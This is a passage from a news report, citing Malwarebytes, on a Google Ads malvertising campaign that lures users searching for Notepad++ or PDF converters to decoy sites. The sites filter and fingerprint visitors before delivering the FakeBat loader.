malvertising campaign that is targeting users searching for PDF converters or Notepad++ on Google. As per a TOI report, the campaign uses Google Ads to direct users to dangerous landing pages and distribute malicious payloads. According to Malwarebytes, this campaign is unique in its ability to fingerprint users and distribute time-sensitive payloads.
The hackers behind this campaign specifically target users who are searching for free versions of Notepad++ and PDF converters.
They create fake ads on Google search that filter out bots and unwanted IP addresses, redirecting users to a decoy website. The first level of filtering occurs when users click on these ads, discarding VPNs and non-genuine IP addresses. The decoy site then silently fingerprints the system to check if the request is coming from a virtual machine.
To track potential targets and make each download unique and time-sensitive, a unique ID is assigned to each victim.
The final-stage malware establishes a connection to a remote domain («mybigeye[.]icu») on a custom port and serves follow-on malware through an HTA payload. Jerome Segura, the director of threat intelligence at Malwarebytes, stated that threat actors are using evasion techniques to bypass ad verification checks and target specific victims. He also noted that with a reliable malware delivery chain, malicious actors can focus on improving their decoy pages and creating custom malware payloads.
Users who visit the decoy site are tricked into downloading a malicious installer, which then executes FakeBat (also known as EugenLoader).